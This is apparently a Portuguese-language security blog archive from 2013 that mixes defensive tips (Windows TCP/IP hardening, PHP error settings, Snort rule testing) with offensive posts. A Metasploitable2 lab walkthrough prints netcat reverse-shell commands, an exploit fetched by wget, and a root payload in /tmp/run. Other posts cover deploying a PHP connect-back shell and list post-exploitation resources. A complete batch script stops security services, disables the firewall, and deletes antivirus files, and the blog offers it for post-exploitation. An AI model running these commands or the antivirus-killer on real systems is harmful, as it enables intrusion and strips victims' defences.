quinta-feira, 31 de janeiro de 2013

Help Prevent DoS against Windows Server 2003


Security Consideration for Network Attacks

Denial of service (DoS) attacks are network attacks that attempt to make a computer or a particular service on a computer unavailable to network users. DoS attacks can be difficult to defend against.

To help prevent these attacks, you should keep your computer updated with the latest security fixes and harden the TCP/IP protocol stack on computers that run Windows Server 2003 with SP1 and are exposed to potential attackers. The default TCP/IP stack configuration is tuned to handle standard intranet traffic. If you connect a computer directly to the Internet, Microsoft recommends that you harden the TCP/IP stack against DoS attacks.

You can add the registry values in the following table to the template file in the
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\
subkey.





You can download my REG file here.

source: Securing Windows Server 2003

Recupere seu Ubuntu (Debian like)


Essa é uma dica rápida para você que teve algum problema com o seu Ubuntu (Debian like) e quer tentar recuperar o sistema. Não vou falar das ferramentas em si para tentar recuperar o sistema e sim como deixar o sistema pronto para que você possa usar tais ferramentas.

Use um CD do Ubuntu, dê o boot pelo CD e escolha a opção “Try Ubuntu without any change to your computer”. Essa opção gera um pseudo-sistema de arquivos que é criado na memória RAM, não danificando o seu sistema. Para reparar seu sistema é necessário montar a partição onde foi instalado o Ubuntu, neste post vamos levar em consideração que nosso sistema foi instalado em /dev/sda1.

Vamos ter que fazer com que a partição do Ubuntu faça parte da raiz do sistema de arquivos, como se tivéssemos iniciado junto com o boot do sistema na ora do boot. Lendo algumas dicas da comunidade Ubuntu isso não é recomendado enquanto o desktop do LiveCD esteja sendo executado, então para isso temos que mudar para o modo single-user. Apenas faça o procedimento abaixo:

1. Você acabou de da o boot pelo CD do Ubuntu, e já esta na Área de Trabalho. Pressione Ctrl+Alt+F2, em seguida digite o comando “sudo telinit 1” para mudar o nível de execução do sistema. Uma tela igual da figura abaixo ira aparecer, escolha a opção “root – drop to root Shell prompt”.



2. Agora execute os comandos abaixo para montar nossa partição com o Ubuntu instalado e mudar o diretório root atual para este diretório.

#mkdir /mnt/ubuntu
#mount /dev/sda1 /mnt/ubuntu
#chroot /mnt/ubuntu
#bash

Pronto, podemos executar qualquer comando para tentar recuperar nosso sistema, a partir desse momento a raiz do sistema "/" será /mnt/ubuntu.

Bom Proveito.

quarta-feira, 30 de janeiro de 2013

Using Metasploit Browser Autopwn

Como é fácil se parecer com um hacker.

Metasploit - Post Exploitation Gathering WinSCP Credentials

Alert - PHP errors enabled

You can disable display_errors from your site’s php.ini, from the PHP code itself or from the .htaccess as follows:

php.ini
display_errors = ‘off’
log_errors = ‘on’

.htaccess
php_flag display_errors off
php_flag log_errors on

Turn off error reporting using PHP code in your PHP website
  error_reporting(0); // Turn off all error reporting
 ?>

fonte: http://www.websitedefender.com/web-security/php-errors-enabled/

terça-feira, 29 de janeiro de 2013

Analisando o vídeo: Metasploitable 2 Distccd Exploit and Privilege Escalation

No projeto Metasploitable2 tem uma falha do Distccd que escuta na porta 3632/TCP, essa falha já pode ser explorada usando o Metasploit (use exploit/unix/misc/distcc_exec).

Usando o Metasploit tudo é mais fácil e bem flexível, dependendo da sua necessidade é uma ótima opção. O que mais me chama atenção não é o simples fato de explorar a falha e conseguir um shell, e sim entender como tudo funciona, a técnica, as habilidades necessárias, entre outras coisas.

Navegando pela Internet encontrei um vídeo que mostra como explorar esta falha de uma maneira diferente, mais trabalhosa é claro, mas que vale apena analisar. A proposta aqui não é mostrar o que fazer, porque isso já se tem no vídeo, e sim de maneira clara e direta tentar explicar o porquê de tais passos. Primeiramente recomendo que você veja o vídeo:


Antes de começarmos veja abaixo o cenário criado no vídeo:




Passo 1

Foi usado a ferramenta nmap para tentar obter a versão do Sistema Operacional (-O) e a versão dos serviços (-sV) que poderão estar escutando entre as portas 1 e 65535 (-p1-65535) da máquina 192.168.2.58 (Metasploitable2). Podemos ver que o resultado do comando mostra que a porta 3632/TCP esta aberta e mostra também a versão do Distccd.

Passo 2

Nessa etapa ele mencionou que iria fazer uma busca na base de exploits usando como palavra-chave "distcc", como podemos ver não foi isso que foi feito. Se essa busca fosse realizada retornaria dois exploits que pertence ao projeto Metasploit, como não é o nosso foco usar o Metasploit então não serve. Outra coisa que deve ser observado é que esta etapa não deveria acontecer nesse momento, e sim só depois de já ter invadido o servidor, onde em seguida ele buscaria alguma brecha no sistema para elevar seus privilégios. Vamos fazer assim, digamos que ele ainda não realizou essa etapa e no momento certo a executaremos.

Passo 3

Bom, só para deixar claro esse seria o nosso segundo passo apesar de estar passo 3. Primeiramente vamos falar do script do Nmap. Esse script detecta e explora a vulnerabilidade do Distccd e pode ser usado para executar algum comando na máquina alvo, foi exatamente isso que foi feito com a opção:

--script-args="distcc-exec.cmd='nc -e /bin/bash 192.168.2.41 6676'". 

Neste caso o comando nc é executado, a opção -e indica o que deverá ser executado depois que a conexão é estabelecida, neste caso a nossa shell (/bin/bash). Neste cenário temos uma conexão reversa, mas para funcionar temos que executar o comando nc em um terminal da máquina de IP 192.168.2.41 (BackTrack) para escutar na porta 6676, assim a máquina alvo vai se conectar na nossa máquina pela porta 6676. Abra outro terminal e execute o comando abaixo:

#nc -vnlp 6676

Agora só é executar o comando nmap abaixo:

#nmap -p 3632 192.168.2.58 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='nc -e /bin/bash 192.168.2.41 6676'"

E na tela onde executou o nc para escutar na porta 6676 é só executar qualquer comando do linux. No vídeo ele executa o “uname”, para obter informações do sistema e depois executa o comando “id”, para ver suas permissões no sistema, neste caso uid=1 (daemon) que é um usuário sem privilégios.

Passo 4

Lembra do passo 2? Agora chegou a hora dele. Já conseguimos invadir o sistema e sabemos que não somos root, próximo passo escalar privilégio, ou seja, vamos virar root na máquina. Existem vários programas que agilizam este processo, não vou detalhar aqui isso, faça uma busca pelo Google. Com informações sobre o sistema podemos buscar por exploits conhecidos, neste caso sabemos que se trata do Metasploitable2, sendo assim é um Ubuntu 8.04 que por padrão vem com o distcc vulnerável (http://www.ubuntu.com/usn/usn-758-1/), tendo essas informações vamos realizar o que seria nosso passo 2.

Ele buscou na base de exploits se tem algo para o udev:
#cd /pentest/exploits/exploitdb
#./searchsploit udev linux local

Retornou duas opções, neste caso ele usou o segundo exploit (8572.c). Próximo passo seria copiar esse arquivo para a máquina alvo, para isso ele copiou o exploit para dentro do /var/ww renomeando para udev.c. Esse diretório é padrão do Apache Linux, que esta rodando no backtrack. Executando o wget (wget http://192.168.2.41/udev.c) na conexão reversa ele consegue baixar este arquivo para dentro da máquina vulnerável e compila (gcc udev.c -o udev) o mesmo.

Antes de continuarmos quero esclarecer algo para que ninguém fique confuso. Até aqui ele já conseguiu invadir a máquina, o problema é que essa conexão foi estabelecida sem privilégios, ou seja, ele não é root. O que ele esta tentando agora é explorar uma falha do udev (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1185) para virar root no sistema, para isso ele carregou um exploit na máquina alvo e vai executar esse exploit. Lendo o exploit (8572.c) podemos ver o que é preciso para ele funcionar, veja o que esta escrito entre as linhas 27 e 31:

 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 *
 *   The exploit will execute /tmp/run as root so throw whatever payload you
 *   want in there.

Essas informações são fundamentais para que o exploit funcione. Podemos ver que o exploit vai executar com permissões de root o arquivo que será criado (/tmp/run), e recomenda que nosso payload seja colocado nesse arquivo.

Ele executou o nc no backtrack para escutar na porta 1234, o payload que ele carrega vai se conectar nessa porta. A seguência de comandos abaixo serviu para ele criar o payload (/tmp/run):

echo "#!/bin/sh" > /tmp/run
echo "/bin/netcat -e /bin/sh 192.168.2.41 1234" >> /tmp/run
chmod +x /tmp/run

obs: esses comandos foram executados na janela onde esta rodando a conexão reversa, esse arquivo tem que ser criado na máquina alvo.

Na linha 27 do código fonte do exploit diz que é preciso encontrar o PID do udevd e executar o exploit diminuindo esse valor por 1. Primeiro ele executou "ps aux | grep udev" e viu que o PID é 2717, em seguida ele executou o exploit (./udev 2716). Pronto temos nossa conexão reversa com permissão de root.

Passo 5

Ele executou um comando em python (python -c 'import pty; pty.spawn("/bin/bash")'), para que possamos entender esse comando vamos primeiro falar de PTY.

Um pty é um pseudoterminal - simula ao programa que esta anexado um terminal, em vez de se comunicar diretamente com um terminal ele transfere a entrada e saída para outro programa. Por exemplo, quando você executa um "ls" dentro de uma conexão ssh, o comando "ls" envia sua saída para um pseudo terminal, do outro lado, que esta acessando o servidor SSHD. O PTY nos permite conectar numa shell de forma remota onde podemos executar comandos. Normalmente se usa esse comando em python quando é gerado um erro ao tentar executar alguns comandos, como su, ssh ou login. Esse comando gera um shell anexando uma PTY. Ele não precisaria disso porquê qualquer comando já seria executado como root, mas poderia ser um problema se fosse preciso executar outros comandos.

Pronto. Espero que tenham gostado.


sexta-feira, 18 de janeiro de 2013

Grayscale PHP Connect Back Shell Utility 1.1

Grayscale PHP Connect Back Shell Utility 1.1
Source:Grayscale Research

This tool is useful specificially for penetration tests which include LAMP/WAMP servers. Upload this script to a remote host with file upload, locate script, and set up an accessable listening socket.

Set Up Listener (any port can be used):
nc -l -p 777

Then invoke the page as follows:
http://website/php_connectback.php?host=connectbackipaddress&port=777


This will use the php engine to connect back to the host and allow for a shell to be spawned remotely using just PHP.

http://www.grayscale-research.org/new/code/GS-PHPConnectBack.tar

quinta-feira, 17 de janeiro de 2013

SQL Injection Cheat Sheet


MySQL - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
Oracle - http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
MSSQL - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Postgres - http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
Ingres  - http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet
DB2 - http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet
Informix - http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet
MS Access - http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html

SQLi - ERROS COMUNS EM BANCO DE DADOS


Pequeno trecho da minha monografia que estarei defendendo em fevereiro 2013.

11. ERROS COMUNS EM BANCO DE DADOS

É muito importante saber identificar e estar familiarizado com os vários tipos de erros emitidos pelo banco de dados quando se realiza testes de SQL injection. Como visto antes, temos um cenário de três camadas, onde o servidor WEB fica no meio entre o usuário (browser) e o banco de dados. Dependendo de como foi desenvolvido a aplicação web, os erros emitidos pelo banco de dados podem ser manipulados pela aplicação da seguinte forma:

- O erro em SQL é mostrado na tela do browser para o usuário

- O erro em SQL é escondido na própria página web por motivos de depuração

- O usuário é redirecionado para outra página

- Os erros em HTTP podem ser obtidos: 500 e 302

- O aplicativo lida com o erro corretamente e simplesmente não mostra resultados, talvez exibição de uma página de erro genérica.

Para identificar possíveis brechas de SQL injection é preciso identificar os erros retornados pela aplicação web.

quarta-feira, 16 de janeiro de 2013

terça-feira, 15 de janeiro de 2013

Anatomy of a mobile attack


Testando Regras do Snort

Estou começando a brincar com o snort novamente e algo importante depois de configurar e customizar o snort é testar suas regras. Na verdade minha brincadeira começa ai. A ideia é propor um cenário onde você possa testar as regras do snort, com isso você poderá ter as seguintes informações: quanto tempo que suas regras demoram para serem atualizadas depois que saiu algum exploit novo e poderá verificar se uma regra nova esta funcionando.

Neste post não vou entrar em detalhes como o LAB foi montado, apenas irei expor minha ideia para que se possa realizar os testes necessários. Para o nosso teste podemos usar o Metasploit ou outra ferramenta do tipo, podendo até mesmo usar um exploit especifico se for o caso. Veja abaixo como ficou o nosso cenário de teste:



Na máquina A temos um windows (xp, vista, 7, etc), rodando alguma aplicação vulnerável onde já tenha o exploit no Metasploit. Sempre aparece falhas de segurança no Java e no Internet Explorer, então escolha uma das duas aplicações ou utilize a ferramenta autopwn do projeto metasploit, veja o vídeo abaixo:




Na máquina B temos um Linux, onde iremos instalar o metasploit e o tcpdump. O snort pode ser opcional porque poderemos testar em outra máquina onde já tenha o snort instalado e configurado.

Segue os procedimentos necessários:

1 - rode o tcpdump para salvar em arquivo todo o tráfego gerado
2 - Execute metasploit autopwn (conforme no vídeo acima)

Na máquina rodando o snort rode o seguinte comando:
#snort -c /usr/local/etc/nsm/snort.conf -r /tmp/autopwn-trafego.pcap -l /tmp/ -A full -b

autopwn-trafego.pcap = é o arquivo salvo com o comando tcpdump.

Agora rode o grep para ler o arquivo alert que foi gerado dentro do diretório /tmp:

#grep '\[\*\*\]' /tmp/alert

Agora é só analisar o que foi detectado pelo snort.

Outra maneira de gerar esse tráfego para ser salvo pelo tcpdump seria utilizando a ferramenta hping. Pegue o valor do campo "content" de alguma regra do snort e passe esse valor para o hping. Digamos que tem uma regra com "content:"AAAAAAAAAAAAAAAAAAAAAAAAA";", agora criamos um arquivo com o valor "AAAAAAAAAAAAAAAAAAAAAAAAA" e chamamos esse arquivo com o comando:

#hping3 -P -i eth1 -s 3434 -p 81 -d 26 -E ./payload.txt 192.168.1.37

Agora sim vamos começar a brincar de verdade, check os links abaixo:

https://community.rapid7.com/community/metasploit/blog/2011/07/08/testing-snort-ids-with-metasploit-vsploit-modules

https://community.rapid7.com/community/metasploit/blog/2011/06/13/emulating-suspicious-dns-traffic-with-metasploit-framework

http://vimeo.com/24571294

http://vimeo.com/24572815
Bom Proveito.

sexta-feira, 11 de janeiro de 2013

Técnicas de Post Exploitation

Segue uma lista de alguns sites que mostram o que fazer logo depois de invadir um sistema, conhecido também como Post Exploitation.

Post Exploitation Using Meterpreter
http://www.exploit-db.com/wp-content/themes/exploit/docs/18229.pdf

Post-Exploitation phase
http://www.pentest-standard.org/index.php/Post_Exploitation

Post Exploitation Command Lists
http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html

MSF Post Exploitation
http://www.offensive-security.com/metasploit-unleashed/MSF_Post_Exploitation

Post-Exploitation in Windows: From Local Admin To Domain Admin
http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin

Kill Antivirus

Segue abaixo um exemplo de um batch script que tem a finalidade de parar qualquer antivirus, ótimo para post exploitation.

Abra o notepad cole o conteudo abaixo e salve como killav.bat.

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Uma outra solução seria a utilização do script killav.rb que faz parte do Projeto Metasploit. O problema é que este script já esta sendo detectado pela maioria dos antivírus, então foi pensado numa outra solução chamado getcountermeasure.rb. Para maiores informações sobre getcountermeasure.rb veja os links abaixo:

http://wiki.mccune.org.uk/index.php/Metasploit

https://github.com/pwnieexpress/metasploit-framework/blob/master/scripts/meterpreter/getcountermeasure.rb

pfSense 2.0.1 CSRF RCE remote root shell

######################################################################
# Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access
# Date: 04/01/2013
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.0.1
# Category: XSS & CSRF Remote root Access
# Google dork:
# Tested on: FreeBSD
######################################################################




source: http://www.exploit-db.com/exploits/23901/

Securing your application against Cross-Site Request Forgery

Securing your application against Cross-Site Request Forgery has never been easier. Why rewrite every form on your website when a program can do it for you? Simply drop this at the top of every PHP file:
 
require_once '/path/to/csrf-magic.php';

...and let the magic take care of the rest. Download it now! Or try out the demo.

source: http://csrf.htmlpurifier.org/

quinta-feira, 10 de janeiro de 2013

Removing administrator rights or do not log in with Administrators user from laptop

Laptops present a significant challenge for security focused companies. Laptop computers can be a common mechanism for viruses, spyware, and other security threats to enter an otherwise well-protected corporate network. Additionally, laptop users have sensitive data stored on their computer, making their protection increasingly important.
Removing administrator rights or do not log in with Administrators user from laptop increases protection from viruses and spyware. Without administrator rights most malware cannot install. Furthermore, a review of all vulnerabilities documented in last year's Microsoft Security Bulletins shows that removing admin rights can mitigate the effects of 92 percent of critical Microsoft vulnerabilities.
However, travelling laptop users need administrator rights to perform many functions on their computers such as connecting to a hotel printer, or installing authorized software and ActiveX controls.

source: email sent by BeyondTrust.

Computer network monitoring, security and audit tools